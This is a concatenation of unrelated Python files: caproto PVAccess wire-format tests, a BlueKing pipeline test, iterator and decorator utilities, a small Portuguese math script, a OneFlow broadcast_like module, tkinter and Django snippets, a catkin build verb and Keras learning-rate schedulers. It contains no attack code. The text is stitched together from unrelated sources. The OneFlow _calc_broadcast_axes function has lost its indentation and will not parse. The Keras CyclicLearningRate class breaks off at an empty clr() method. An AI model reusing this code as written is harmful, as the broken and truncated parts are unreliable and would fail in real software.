    status, buf, consumed = pva.Status.deserialize(buf, endian=pva.BIG_ENDIAN)
    assert status.status == pva.StatusType.OK
    assert consumed == 1
    # WARNING carries a short message.
    print('\n- status 2')
    status, buf, consumed = pva.Status.deserialize(buf, endian=pva.BIG_ENDIAN)
    assert status.status == pva.StatusType.WARNING
    assert consumed == 13
    # ERROR carries a message plus a long call tree.
    print('\n- status 3')
    status, buf, consumed = pva.Status.deserialize(buf, endian=pva.BIG_ENDIAN)
    assert status.status == pva.StatusType.ERROR
    assert consumed == 264
@pytest.mark.parametrize(
    "data, expected",
    [
        pytest.param(
            _fromhex(
                "FD0001800B74696D655374616D705F74"  # .... .tim eSta mp_t
                "03107365636F6E64735061737445706F"  # ..se cond sPas tEpo
                "6368230B6E616E6F5365636F6E647322"  # ch#. nano Seco nds"
                "077573657254616722"  # .use rTag "
            ),
            textwrap.dedent('''
            struct timeStamp_t
                int64 secondsPastEpoch
                int32 nanoSeconds
                int32 userTag
            '''.rstrip()),
            id='example1'
        ),
        pytest.param(
            _fromhex(
                "FD000180106578616D706C6553747275"  # .... .exa mple Stru
                "6374757265070576616C75652810626F"  # ctur e..v alue ..bo
                "756E64656453697A6541727261793010"  # unde dSiz eArr ay0.
                "0E666978656453697A65417272617938"  # .fix edSi zeAr ray8
                "040974696D655374616D70FD00028006"  # ..ti meSt amp. ....
                "74696D655F7403107365636F6E647350"  # time _t.. seco ndsP
                "61737445706F6368230B6E616E6F7365"  # astE poch #.na nose
                "636F6E64732207757365725461672205"  # cond s".u serT ag".
                "616C61726DFD00038007616C61726D5F"  # alar m... ..al arm_
                "74030873657665726974792206737461"  # t..s ever ity" .sta
                "74757322076D657373616765600A7661"  # tus" .mes sage `.va
                "6C7565556E696F6EFD00048100030B73"  # lueU nion .... ...s
                "7472696E6756616C75656008696E7456"  # trin gVal ue`. intV
                "616C7565220B646F75626C6556616C75"  # alue ".do uble Valu
                "65430C76617269616E74556E696F6EFD"  # eC.v aria ntUn ion.
                "000582"  # ...
            ),
            textwrap.dedent('''
            struct exampleStructure
                byte[1] value
                byte<16> boundedSizeArray
                byte[4] fixedSizeArray
                struct timeStamp
                    int64 secondsPastEpoch
                    int32 nanoseconds
                    int32 userTag
                struct alarm
                    int32 severity
                    int32 status
                    string message
                union valueUnion
                    string stringValue
                    int32 intValue
                    float64 doubleValue
                any variantUnion
            '''.rstrip()),
            id='example2'
        ),
    ]
)
def test_fielddesc_examples(data, expected):
    """Deserialized FieldDesc summaries match the documented examples.

    FIX: the original did `print(info.summary() == expected)`, which
    asserts nothing and can never fail; this is now a real assertion.
    """
    cache = pva.CacheContext()
    info, buf, offset = pva.FieldDesc.deserialize(data, endian='<', cache=cache)
    # The dedented expected literal starts with a newline from the
    # triple-quoted string; compare with outer whitespace stripped so the
    # comparison is on content.
    assert info.summary().strip() == expected.strip()
@pva.pva_dataclass
class my_struct:
    """pva struct mirroring the serialized example: variable, bounded and
    fixed arrays, two nested structs, a union and a variant union."""
    value: List[pva.Int8]                      # variable-length int8 array
    boundedSizeArray: pva.array_of(pva.Int8,
                                   array_type=FieldArrayType.bounded_array,
                                   size=16)    # at most 16 elements
    fixedSizeArray: pva.array_of(pva.Int8,
                                 array_type=FieldArrayType.fixed_array,
                                 size=4)       # exactly 4 elements

    @pva.pva_dataclass
    class timeStamp_t:
        secondsPastEpoch: pva.Int64
        nanoSeconds: pva.UInt32
        userTag: pva.UInt32

    timeStamp: timeStamp_t

    @pva.pva_dataclass
    class alarm_t:
        severity: pva.Int32
        status: pva.Int32
        message: str

    alarm: alarm_t
    valueUnion: Union[str, pva.UInt32]  # discriminated union of two branches
    variantUnion: typing.Any            # 'any' (variant) union
# Parametrize cases for test_serialize below:
# (struct class, structured data, expected wire bytes, endian).
# The commented-out dedent block documents the expected summary of
# my_struct for reference.
repr_with_data = [
    pytest.param(
        # textwrap.dedent('''\
        # struct my_struct
        #     int8[] value
        #     int8<16> boundedSizeArray
        #     int8[4] fixedSizeArray
        #     struct timeStamp_t timeStamp
        #         int64 secondsPastEpoch
        #         uint32 nanoSeconds
        #         uint32 userTag
        #     struct alarm_t alarm
        #         int32 severity
        #         int32 status
        #         string message
        #     union valueUnion
        #         string String
        #         uint32 Uint32
        #     any variantUnion
        # '''.strip()),
        my_struct,
        {
            'value': [1, 2, 3],
            'boundedSizeArray': [4, 5, 6, 7, 8],
            'fixedSizeArray': [9, 10, 11, 12],
            'timeStamp': {
                'secondsPastEpoch': 0x1122334455667788,
                'nanoSeconds': 0xAABBCCDD,
                'userTag': 0xEEEEEEEE,
            },
            'alarm': {
                'severity': 0x11111111,
                'status': 0x22222222,
                'message': "Allo, Allo!",
            },
            'valueUnion': {
                'str': None,
                'UInt32': 0x33333333,
            },
            'variantUnion': "String inside variant union.",
        },
        # TODO_DOCS: example is strictly speaking incorrect, the value 0xAABBCCDD
        # will not fit in an int32, so changed to uint for now
        # NOTE: selector added as 'value' after union
        (_fromhex('03010203' '05040506' '0708090A' '0B0C1122'  # .... .... .... ..."
                  '33445566' '7788AABB' 'CCDDEEEE' 'EEEE1111'  # 3DUf w... .... ....
                  '11112222' '22220B41' '6C6C6F2C' '20416C6C'  # .."" "".A llo, All
                  '6F210133' '33333360' '1C537472' '696E6720'  # o!.3 333` .Str ing
                  '696E7369' '64652076' '61726961' '6E742075'  # insi de v aria nt u
                  '6E696F6E' '2E')),  # nion .
        pva.BIG_ENDIAN,
        id='first_test'
    ),
]
@pytest.mark.parametrize("struct, structured_data, expected_serialized, endian",
                         repr_with_data)
def test_serialize(struct, structured_data, expected_serialized, endian):
    """Round-trip: serialize, compare against the expected bytes, deserialize."""
    desc = struct._pva_struct_
    print(desc.summary())
    ctx = pva.CacheContext()
    wire = b''.join(pva.to_wire(desc, value=structured_data, endian=endian))
    assert wire == expected_serialized
    round_tripped, _buf, _offset = pva.from_wire(
        desc, wire, cache=ctx, endian=endian, bitset=None)
    # Normalize array.array values to plain lists before comparing.
    normalized = {
        key: (val.tolist() if isinstance(val, array) else val)
        for key, val in round_tripped.items()
    }
    assert normalized == structured_data
@pytest.mark.parametrize(
    "field_type, value, array_type",
    [(FieldType.int64, 1, FieldArrayType.scalar),
     (FieldType.int64, [1, 2, 3], FieldArrayType.variable_array),
     (FieldType.boolean, True, FieldArrayType.scalar),
     (FieldType.boolean, [True, True, False], FieldArrayType.variable_array),
     (FieldType.float64, 1.0, FieldArrayType.scalar),
     (FieldType.float64, [2.0, 2.0, 3.0], FieldArrayType.variable_array),
     (FieldType.float64, array('d', [2.0, 2.0, 3.0]), FieldArrayType.variable_array),
     (FieldType.string, 'abcdefghi', FieldArrayType.scalar),
     (FieldType.string, ['abc', 'def'], FieldArrayType.variable_array),
     ]
)
def test_variant_types_and_serialization(field_type, value, array_type):
    """Scalar and array values survive a wire round-trip in both endians."""
    descriptor = pva.FieldDesc(name='test', field_type=field_type,
                               array_type=array_type, size=1)
    ctx = pva.CacheContext()
    for endian in (pva.LITTLE_ENDIAN, pva.BIG_ENDIAN):
        wire = b''.join(pva.to_wire(descriptor, value=value, cache=ctx,
                                    endian=endian))
        print(field_type, value, '->', wire)
        deserialized, remaining, consumed = pva.from_wire(
            descriptor, data=wire, cache=ctx, endian=endian)
        # The whole buffer must be consumed with nothing left over.
        assert len(remaining) == 0
        assert consumed == len(wire)
        if field_type.name == 'string':
            assert deserialized == value
        else:
            assert_array_almost_equal(deserialized, value)
# (bit set, expected serialization) pairs.  The leading byte is the encoded
# byte count; subsequent bytes are the little-endian bitmask (bit k of byte j
# represents element 8*j + k of the set).
bitsets = [
    (set(),
     _fromhex('00')),
    ({0},
     _fromhex('01 01')),
    ({1},
     _fromhex('01 02')),
    ({7},
     _fromhex('01 80')),
    ({8},
     _fromhex('02 00 01')),
    ({15},
     _fromhex('02 00 80')),
    ({55},
     _fromhex('07 00 00 00 00 00 00 80')),
    ({56},
     _fromhex('08 00 00 00 00 00 00 00 01')),
    ({63},
     _fromhex('08 00 00 00 00 00 00 00 80')),
    ({64},
     _fromhex('09 00 00 00 00 00 00 00 00 01')),
    ({65},
     _fromhex('09 00 00 00 00 00 00 00 00 02')),
    ({0, 1, 2, 4},
     _fromhex('01 17')),
    ({0, 1, 2, 4, 8},
     _fromhex('02 17 01')),
    ({8, 17, 24, 25, 34, 40, 42, 49, 50},
     _fromhex('07 00 01 02 03 04 05 06')),
    ({8, 17, 24, 25, 34, 40, 42, 49, 50, 56, 57, 58},
     _fromhex('08 00 01 02 03 04 05 06 07')),
    ({8, 17, 24, 25, 34, 40, 42, 49, 50, 56, 57, 58, 67},
     _fromhex('09 00 01 02 03 04 05 06 07 08')),
    ({8, 17, 24, 25, 34, 40, 42, 49, 50, 56, 57, 58, 67, 72, 75},
     _fromhex('0A 00 01 02 03 04 05 06 07 08 09')),
    ({8, 17, 24, 25, 34, 40, 42, 49, 50, 56, 57, 58, 67, 72, 75, 81, 83},
     _fromhex('0B 00 01 02 03 04 05 06 07 08 09 0A')),
]
@pytest.mark.parametrize("bitset", bitsets)
def test_bitset(bitset):
    """BitSet wire format round-trips in both directions (little-endian)."""
    expected_set, expected_bytes = bitset
    decoded, _buf, consumed = pva.BitSet.deserialize(
        expected_bytes, endian='<')
    assert consumed == len(expected_bytes)
    assert decoded == expected_set
    print('serialized', pva.BitSet(expected_set).serialize(endian='<'))
    encoded = b''.join(pva.BitSet(expected_set).serialize(endian='<'))
    assert encoded == expected_bytes
def test_search():
    """SearchRequestLE serializes to the expected bytes and round-trips,
    with one channel and then with two (channel_count updates accordingly)."""
    # uses nonstandard array type, so custom code path
    from caproto.pva import SearchRequestLE
    addr = '127.0.0.1'
    pv = 'TST:image1:Array'
    channel1 = {'id': 0x01, 'channel_name': pv}
    req = SearchRequestLE(
        sequence_id=1,
        flags=(pva.SearchFlags.reply_required | pva.SearchFlags.unicast),
        response_address=(addr, 8080),
        protocols=['tcp'],
        channels=[channel1],)
    # NOTE: cache needed here to give interface for channels
    cache = pva.CacheContext()
    serialized = req.serialize(cache=cache)
    assert req.response_address == addr
    assert req.channel_count == 1
    # Expected little-endian wire image for the single-channel request.
    assert serialized == (
        b'\x01\x00\x00\x00\x81\x00\x00\x00'
        b'\x00\x00\x00\x00\x00\x00\x00\x00\x00'
        b'\x00\xff\xff\x7f\x00\x00\x01\x90\x1f'
        b'\x01\x03tcp\x01\x00\x01\x00\x00\x00'
        b'\x10TST:image1:Array'
    )
    deserialized, buf, consumed = SearchRequestLE.deserialize(
        bytearray(serialized), cache=cache)
    assert consumed == len(serialized)
    assert deserialized.channel_count == 1
    assert deserialized.channels == [channel1]
    assert deserialized.response_address == addr
    # Add a second channel and verify the count and payload both grow.
    channel2 = {'id': 0x02, 'channel_name': pv + '2'}
    req.channels = [channel1, channel2]
    serialized = req.serialize(cache=cache)
    assert req.channel_count == 2
    assert serialized == (
        b'\x01\x00\x00\x00\x81\x00\x00\x00'
        b'\x00\x00\x00\x00\x00\x00\x00\x00\x00'
        b'\x00\xff\xff\x7f\x00\x00\x01\x90\x1f'
        b'\x01\x03tcp'
        b'\x02\x00'
        b'\x01\x00\x00\x00'
        b'\x10TST:image1:Array'
        b'\x02\x00\x00\x00'
        b'\x11TST:image1:Array2'
    )
    deserialized, buf, consumed = SearchRequestLE.deserialize(
        bytearray(serialized), cache=cache)
    assert consumed == len(serialized)
    assert deserialized.channel_count == 2
    assert deserialized.channels == [channel1, channel2]
def test_broadcaster_messages_smoke():
    """Smoke test: search request/response messages serialize without error."""
    broadcaster = pva.Broadcaster(our_role=pva.Role.SERVER, broadcast_port=5,
                                  server_port=6)
    pv_to_cid, search_request = broadcaster.search(['abc', 'def'])
    search_request.serialize()
    search_response = broadcaster.search_response(pv_to_cid={'abc': 5, 'def': 6})
    search_response.serialize()
def test_qos_flags_encode():
    """decode(encode(...)) is the identity on a (priority, flags) pair."""
    encoded = pva.QOSFlags.encode(priority=0, flags=pva.QOSFlags.low_latency)
    decoded = pva.QOSFlags.decode(encoded)
    assert decoded == (0, pva.QOSFlags.low_latency)
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
from pipeline.service.pipeline_engine_adapter.adapter_api import run_pipeline
from pipeline.parser.pipeline_parser import PipelineParser, WebPipelineAdapter
from pipeline.utils.uniqid import uniqid, node_uniqid
from .new_data_for_test import (
PIPELINE_DATA,
WEB_PIPELINE_WITH_SUB_PROCESS2
)
def test_run_serial_pipeline():
    """Parse the canned serial pipeline fixture and run it through the engine."""
    parser_obj = PipelineParser(PIPELINE_DATA)
    run_pipeline(parser_obj.parser())
def test_run_sub_pipeline2():
    """Parse the sub-process web pipeline fixture and run it through the engine."""
    parser_obj = WebPipelineAdapter(WEB_PIPELINE_WITH_SUB_PROCESS2)
    run_pipeline(parser_obj.parser())
def main_test():
    """Build a 25-activity serial pipeline programmatically and run it.

    Topology: start -> (flow -> activity) x 25 -> flow -> end, wired through
    pre-generated node ids: id_list[0] is the pipeline id, [1] the start
    event, [53] the end event; even indices 2..52 are flows and odd indices
    3..51 are activities.
    """
    # FIX: xrange is Python-2 only (NameError under Python 3); range iterates
    # identically in both interpreters.
    id_list = [node_uniqid() for i in range(100)]
    pipe1 = {
        'id': id_list[0],
        'name': 'name',
        'start_event': {
            'id': id_list[1],
            'name': 'start',
            'type': 'EmptyStartEvent',
            'incoming': None,
            'outgoing': id_list[2]
        },
        'end_event': {
            'id': id_list[53],
            'name': 'end',
            'type': 'EmptyEndEvent',
            'incoming': id_list[52],
            'outgoing': None
        },
        'activities': {
        },
        'flows': {  # all flow (edge) definitions of this pipeline
        },
        'gateways': {  # detailed gateway definitions (none in this test)
        },
        'data': {
            'inputs': {
            },
            'outputs': {
            },
        }
    }
    # Chain flow i -> activity i+1 for every even i in [2, 50].
    for i in range(2, 51, 2):
        pipe1['flows'][id_list[i]] = {
            'id': id_list[i],
            'source': id_list[i - 1],
            'target': id_list[i + 1]
        }
        pipe1['activities'][id_list[i + 1]] = {
            'id': id_list[i + 1],
            'type': 'ServiceActivity',
            'name': 'first_task',
            'incoming': id_list[i],
            'outgoing': id_list[i + 2],
            'component': {
                'code': 'demo',
                'inputs': {
                    'input_test': {
                        'type': 'plain',
                        'value': '2',
                    },
                    'radio_test': {
                        'type': 'plain',
                        'value': '1',
                    },
                },
            }
        }
    # Final flow from the last activity into the end event.
    pipe1['flows'][id_list[52]] = {
        'id': id_list[52],
        'source': id_list[52 - 1],
        'target': id_list[52 + 1]
    }
    parser_obj = PipelineParser(pipe1)
    run_pipeline(parser_obj.parser())
|
""" A universal module with functions / classes without dependencies. """
import functools
import re
import os
# Character class of every path separator this platform accepts.
_sep = os.path.sep
if os.path.altsep is not None:
    _sep += os.path.altsep
# Matches a trailing file extension (".py", ".so", ...) or a trailing
# "<sep>__init__.py" — presumably used to trim module file paths elsewhere
# in the package (callers not visible here).
_path_re = re.compile(r'(?:\.[^{0}]+|[{0}]__init__\.py)$'.format(re.escape(_sep)))
del _sep
def to_list(func):
    """Decorator: materialize *func*'s iterable return value as a ``list``.

    FIX: ``functools.wraps`` preserves the wrapped function's name, docstring
    and module (the original wrapper clobbered them).
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        return list(func(*args, **kwargs))
    return wrapper
def to_tuple(func):
    """Decorator: materialize *func*'s iterable return value as a ``tuple``.

    FIX: ``functools.wraps`` preserves the wrapped function's name, docstring
    and module (the original wrapper clobbered them).
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        return tuple(func(*args, **kwargs))
    return wrapper
def unite(iterable):
    """Flatten a two-dimensional iterable into a single set of elements."""
    return {element for group in iterable for element in group}
class UncaughtAttributeError(Exception):
    """
    Important, because `__getattr__` and `hasattr` catch AttributeErrors
    implicitly. This is really evil (mainly because of `__getattr__`).
    Therefore this class originally had to be derived from `BaseException`
    instead of `Exception`. But because I removed relevant `hasattr` from
    the code base, we can now switch back to `Exception`.

    :param base: return values of sys.exc_info().
    """
def safe_property(func):
    """Like ``@property``, but ``AttributeError`` raised inside *func* is
    converted to ``UncaughtAttributeError`` so descriptors cannot swallow it."""
    guarded = reraise_uncaught(func)
    return property(guarded)
def reraise_uncaught(func):
    """
    Re-throw uncaught `AttributeError`.

    Usage: Put ``@rethrow_uncaught`` in front of the function
    which does **not** suppose to raise `AttributeError`.

    AttributeError is easily get caught by `hasattr` and another
    ``except AttributeError`` clause.  This becomes problem when you use
    a lot of "dynamic" attributes (e.g., using ``@property``) because you
    can't distinguish if the property does not exist for real or some code
    inside of the "dynamic" attribute through that error.  In a well
    written code, such error should not exist but getting there is very
    difficult.  This decorator is to help us getting there by changing
    `AttributeError` to `UncaughtAttributeError` to avoid unexpected catch.
    This helps us noticing bugs earlier and facilitates debugging.
    """
    @functools.wraps(func)
    def inner(*args, **kwargs):
        try:
            result = func(*args, **kwargs)
        except AttributeError as exc:
            # Chain the original so the real traceback is preserved.
            raise UncaughtAttributeError(exc) from exc
        return result
    return inner
class PushBackIterator:
    """Iterator wrapper that lets consumed values be pushed back and re-yielded.

    Pushed-back values are yielded LIFO before the underlying iterator
    resumes.  ``current`` always holds the most recently yielded value.
    """

    def __init__(self, iterator):
        self.pushes = []
        self.iterator = iterator
        self.current = None

    def push_back(self, value):
        self.pushes.append(value)

    def __iter__(self):
        return self

    def __next__(self):
        if self.pushes:
            value = self.pushes.pop()
        else:
            value = next(self.iterator)
        self.current = value
        return value
|
from math import sqrt

# Read an integer and report its double, triple and square root.
# (Prompt and output strings are in Portuguese and are left untouched.)
n = int(input('Digite um número: '))
d = n * 2       # double
t = n * 3       # triple
r = sqrt(n)     # square root; raises ValueError for negative input
print('O dobro de {} é {}\nO triplo de {} é {}'.format(n, d, n, t))
print('A raiz quadrada de {} é {}.'.format(n, r))
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import Optional, Sequence
import oneflow as flow
from oneflow.nn.module import Module
def _calc_broadcast_axes(x, like_tensor):
num_prepend = len(like_tensor.shape) - len(x.shape)
prepend_shape = [1] * num_prepend + list(x.shape)
broadcast_axes = [x for x in range(num_prepend)]
for i in range(num_prepend, len(prepend_shape)):
if prepend_shape[i] != like_tensor.shape[i]:
if prepend_shape[i] != 1:
raise RuntimeError(
f"output with shape {x.shape} doesn't match the broadcast shape {like_tensor.shape}"
)
else:
broadcast_axes.append(i)
return tuple(broadcast_axes)
class BroadCastLike(Module):
    """Module wrapper around ``flow._C.broadcast_like``.

    When ``broadcast_axes`` is not supplied, the axes are inferred from the
    operand shapes at call time.
    """

    def __init__(self, broadcast_axes: Optional[Sequence] = None) -> None:
        super().__init__()
        self.broadcast_axes = broadcast_axes

    def forward(self, x, like_tensor):
        axes = (
            _calc_broadcast_axes(x, like_tensor)
            if self.broadcast_axes is None
            else self.broadcast_axes
        )
        return flow._C.broadcast_like(x, like_tensor, broadcast_axes=axes)
def broadcast_like_op(x, like_tensor, broadcast_axes: Optional[Sequence] = None):
    """Broadcast tensor `x` to the shape of `like_tensor` along `broadcast_axes`.

    Args:
        x (Tensor): The input Tensor.
        like_tensor (Tensor): The like Tensor.
        broadcast_axes (Optional[Sequence], optional): The axes you want to broadcast. Defaults to None.

    Returns:
        [Tensor]: Broadcasted input Tensor.

    For example:

    .. code:: python

        >>> import oneflow as flow
        >>> x = flow.randn(3, 1, 1)
        >>> like_tensor = flow.randn(3, 4, 5)
        >>> broadcast_tensor = flow.broadcast_like(x, like_tensor, broadcast_axes=[1, 2])
        >>> broadcast_tensor.shape
        oneflow.Size([3, 4, 5])

    """
    module = BroadCastLike(broadcast_axes=broadcast_axes)
    return module(x, like_tensor)
|
import tkinter as tk
from tkinter import ttk

app = tk.Tk()

def rb_click():
    # Callback fired when the 'Russia' radio button is selected.
    # NOTE(review): prints only an empty line — presumably a placeholder;
    # printing country.get() may have been intended.  Confirm.
    print()

# Shared variable holding the selected value (1 = Russia, 2 = USA).
country = tk.IntVar()
rb1 = tk.Radiobutton(app, text='Russia', value=1, variable=country, padx=15, pady=10, command=rb_click)
rb1.grid(row=1, column=0, sticky=tk.W)
rb2 = tk.Radiobutton(app, text='USA', value=2, variable=country, padx=15, pady=10)
rb2.grid(row=2, column=0, sticky=tk.W)
app.mainloop()
from django.apps import AppConfig
class DevconnectorConfig(AppConfig):
    """Django application configuration for the ``devconnector`` app."""
    name = 'devconnector'
|
from __future__ import print_function
from io import StringIO
from argparse import ArgumentParser
from os.path import join as osp_join
import sys
from catkin_tools.verbs.catkin_build import (
prepare_arguments as catkin_build_prepare_arguments,
main as catkin_build_main,
)
from catkin_tools.verbs.catkin_locate import (
prepare_arguments as catkin_locate_prepare_arguments,
main as catkin_locate_main,
)
from .build_compile_cmd import append_cmake_compile_commands, combine_compile_commands
def prepare_arguments(parser):
    """Extend the stock ``catkin build`` argument parser for this verb."""
    parser = catkin_build_prepare_arguments(parser)
    # Augment the description so --help mentions the extra post-build step.
    parser.description += (
        "After the build is finished, create compile commands in root workspace"
    )
    return parser
def main(opts):
    """Run ``catkin build``, locate the workspace, and merge the per-package
    compile command databases into one at the workspace root.

    Returns the non-zero ``catkin build`` exit code on build failure.
    """
    append_cmake_compile_commands(opts)
    err = catkin_build_main(opts)
    if err != 0:
        return err  # exit if failed

    # Figure out where's the catkin workspace
    catkin_locate_opts = catkin_locate_prepare_arguments(ArgumentParser()).parse_args()
    catkin_locate_opts.package = None
    if opts.workspace is not None:
        catkin_locate_opts.workspace = opts.workspace

    # catkin_locate_main prints the workspace path to stdout; capture it.
    original_stdout = sys.stdout
    sys.stdout = stringio = StringIO()
    try:
        # call locate workspace
        catkin_locate_main(catkin_locate_opts)
        pth = stringio.getvalue().splitlines()[0]
    finally:
        # FIX: always restore stdout — the original leaked the redirect
        # whenever catkin_locate_main (or the empty-output indexing) raised.
        sys.stdout = original_stdout

    combine_compile_commands(pth, osp_join(pth, "build"))
|
# -*- coding: utf-8; -*-
# Copyright (c) 2017, Daniel Falci - danielfalci@gmail.com
# Laboratory for Advanced Information Systems - LAIS
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of deep_pt_srl nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from keras import backend as K
from keras.callbacks import *
import numpy as np
class LrReducer(object):
    """Base class for learning-rate schedulers driven by per-epoch F1 scores.

    Subclasses override ``onEpochEnd``/``calculateNewLr``; the attached
    network's optimizer LR is read and written through the Keras backend.
    """

    def __init__(self, trainingEpochs):
        self.trainingEpochs = trainingEpochs
        self.bestF1 = 0
        self.reductions = 0     # number of LR reductions performed so far
        self.bestEpoch = 0      # epoch at which bestF1 was achieved
        self.currentEpoch = 0

    def setNetwork(self, nn):
        # Network whose optimizer learning rate this reducer manipulates.
        self.nn = nn

    def registerScore(self, newF1, epoch):
        """Record *newF1* for *epoch*; return True iff it is a new best."""
        self.currentEpoch = epoch
        if newF1 > self.bestF1:
            self.bestF1 = newF1
            # FIX: bestEpoch existed but was never updated.
            self.bestEpoch = epoch
            # FIX: print-as-function is valid in both Python 2 and 3; the
            # original print statements were SyntaxErrors under Python 3.
            print('NEW BEST F1 : {}'.format(self.bestF1))
            return True
        return False

    def onEpochEnd(self, f1, epoch):
        # Hook for subclasses.
        pass

    def setParameters(self, options):
        # Hook for subclasses.
        pass

    def getLearningRate(self):
        return K.get_value(self.nn.optimizer.lr)

    def calculateNewLr(self):
        # Hook for subclasses.
        pass

    def setLearningRate(self, new_lr):
        print('NEW LEARNING RATE : {}'.format(new_lr))
        K.set_value(self.nn.optimizer.lr, new_lr)
class RateBasedLrReducer(LrReducer):
    """Time-based decay: shrinks the LR a little more every epoch."""

    def __init__(self, trainingEpochs):
        super(RateBasedLrReducer, self).__init__(trainingEpochs)

    def onEpochEnd(self, f1, epoch):
        self.registerScore(f1, epoch)
        self.calculateNewLr()

    def calculateNewLr(self):
        current_lr = self.getLearningRate()
        # Decay grows with training progress, so later epochs shrink faster.
        decay = current_lr * float(self.currentEpoch) / self.trainingEpochs
        self.setLearningRate(current_lr * 1 / (1 + decay * self.currentEpoch))
class FixedBasedLrReducer(LrReducer):
    """Step schedule: switch to a predefined learning rate at fixed epochs."""

    def __init__(self, trainingEpochs):
        super(FixedBasedLrReducer, self).__init__(trainingEpochs)
        # At epoch changeEpochs[i], switch to lr[i].
        self.changeEpochs = [28, 35, 40, 47]
        self.lr = [0.0005, 0.0003, 0.0001, 0.00005]
        self.current = -1  # index of the last applied schedule entry

    def onEpochEnd(self, f1, epoch):
        if epoch in self.changeEpochs:
            self.calculateNewLr()

    def calculateNewLr(self):
        self.current = self.current + 1
        new_lr = self.lr[self.current]
        # FIX: print-as-function works in both Python 2 and 3; the original
        # print statement was a SyntaxError under Python 3.
        print('changing lr to : {}'.format(new_lr))
        self.setLearningRate(new_lr)
        self.reductions += 1
class PatienceBaseLrReducer(LrReducer):
    """Reduce the LR by ``reduceRate`` after ``patience`` epochs without a
    new best F1, up to ``maxReductions`` times."""

    def __init__(self, trainingEpochs, patience, reduceRate):
        super(PatienceBaseLrReducer, self).__init__(trainingEpochs)
        self.roundsAwaiting = 0     # epochs since the last improvement
        self.reduceRate = reduceRate
        self.patience = patience
        self.maxReductions = 30     # hard cap on the number of reductions
        self.reductions = 0
        # FIX: print-as-function works in both Python 2 and 3; the original
        # print statements were SyntaxErrors under Python 3.
        print('{} - {}'.format(self.reduceRate, self.patience))

    def onEpochEnd(self, f1, epoch):
        if self.registerScore(f1, epoch):
            self.roundsAwaiting = 0
        else:
            if self.roundsAwaiting > self.patience and self.reductions < self.maxReductions:
                self.calculateNewLr()
                self.roundsAwaiting = 0
            else:
                self.roundsAwaiting += 1
                print('rounds awaiting : {}'.format(self.roundsAwaiting))

    def calculateNewLr(self):
        lr = self.getLearningRate()
        new_lr = lr * self.reduceRate
        # FIX: the original printed the *old* rate here; report the new one.
        print('NEW LEARNING RATE : {}'.format(new_lr))
        self.setLearningRate(new_lr)
        self.reductions += 1
class CyclicLearningRate(Callback):
    """Keras callback implementing cyclical learning rates.

    The LR oscillates between ``base_lr`` and ``max_lr`` over a cycle of
    ``2 * step_size`` iterations; ``mode`` (or a custom ``scale_fn``)
    controls how the peak amplitude is scaled as training progresses.
    """

    def __init__(self, base_lr=0.001, max_lr=0.006, step_size=2000., mode='triangular2', gamma=1., scale_fn=None, scale_mode='cycle'):
        super(CyclicLearningRate, self).__init__()
        self.base_lr = base_lr
        self.max_lr = max_lr
        self.step_size = step_size
        self.mode = mode
        self.gamma = gamma
        # FIX: identity comparison with None ('is None'), not '== None'.
        if scale_fn is None:
            if self.mode == 'triangular':
                self.scale_fn = lambda x: 1.
                self.scale_mode = 'cycle'
            elif self.mode == 'triangular2':
                # Halve the cycle amplitude every cycle.
                self.scale_fn = lambda x: 1 / (2. ** (x - 1))
                self.scale_mode = 'cycle'
            elif self.mode == 'exp_range':
                self.scale_fn = lambda x: gamma ** (x)
                self.scale_mode = 'iterations'
            # NOTE(review): an unknown mode leaves scale_fn unset (same as the
            # original); clr() would then raise AttributeError — confirm
            # whether an explicit error is wanted.
        else:
            self.scale_fn = scale_fn
            self.scale_mode = scale_mode
        self.clr_iterations = 0.
        self.trn_iterations = 0.
        self.history = {}
        self._reset()

    def _reset(self, new_base_lr=None, new_max_lr=None, new_step_size=None):
        """Reset the iteration counter, optionally overriding cycle params."""
        if new_base_lr is not None:
            self.base_lr = new_base_lr
        if new_max_lr is not None:
            self.max_lr = new_max_lr
        if new_step_size is not None:
            self.step_size = new_step_size
        self.clr_iterations = 0.

    def clr(self):
        """Current LR according to the triangular schedule position."""
